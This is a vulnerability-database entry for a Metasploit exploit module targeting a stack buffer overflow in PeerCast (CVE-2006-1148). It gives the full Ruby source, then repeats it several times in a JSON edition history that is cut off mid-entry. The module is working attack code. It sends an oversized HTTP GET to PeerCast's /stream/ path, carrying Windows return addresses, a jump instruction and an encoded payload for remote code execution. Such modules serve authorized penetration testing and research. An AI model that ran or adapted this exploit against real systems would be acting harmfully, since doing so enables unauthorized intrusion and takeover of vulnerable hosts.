ID MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'PeerCast URL Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in PeerCast <= v0.1216.
The vulnerability is caused due to a boundary error within the
handling of URL parameters.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-1148'],
['OSVDB', '23777'],
['BID', '17040']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],
['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],
],
'DisclosureDate' => 'Mar 8 2006'))
register_options( [ Opt::RPORT(7144) ])
end
def exploit
connect
pat = rand_text_alphanumeric(1024)
pat[768, 4] = [target.ret].pack('V')
pat[812, 5] = [0xe9, -517].pack('CV')
pat[300, payload.encoded.length] = payload.encoded
uri = '/stream/?' + pat
res = "GET #{uri} HTTP/1.0\r\n\r\n"
print_status("Trying target address 0x%.8x..." % target.ret)
sock.put(res)
sock.close
handler
disconnect
end
end
{"enchantments": {"vulnersScore": 7.5}, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "metasploitReliability": "Average", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2018-02-23T07:16:07", "history": [{"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\n\nend\n", "lastseen": "2017-07-02T23:17:17", "history": [], "modified": "2017-05-03T20:42:21", "enchantments": {}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T23:17:17"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2017-07-24T19:42:55", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["href", "references"], "edition": 2, "lastseen": "2017-07-24T19:42:55"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2017-08-21T15:31:45", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 3, "lastseen": "2017-08-21T15:31:45"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2017-11-02T09:42:18", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 4, "lastseen": "2017-11-02T09:42:18"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2017-11-02T13:39:34", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 7.2, "modified": "2017-11-02T13:39:34"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 5, "lastseen": "2017-11-02T13:39:34"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2017-12-30T04:06:55", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T04:06:55"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 6, "lastseen": "2017-12-30T04:06:55"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2017-12-30T15:59:53", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T15:59:53"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 7, "lastseen": "2017-12-30T15:59:53"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2018-01-09T22:05:33", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": 7.2, "modified": "2018-01-09T22:05:33"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 8, "lastseen": "2018-01-09T22:05:33"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2018-01-10T00:02:03", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 7.2, "modified": "2018-01-10T00:02:03"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 9, "lastseen": "2018-01-10T00:02:03"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 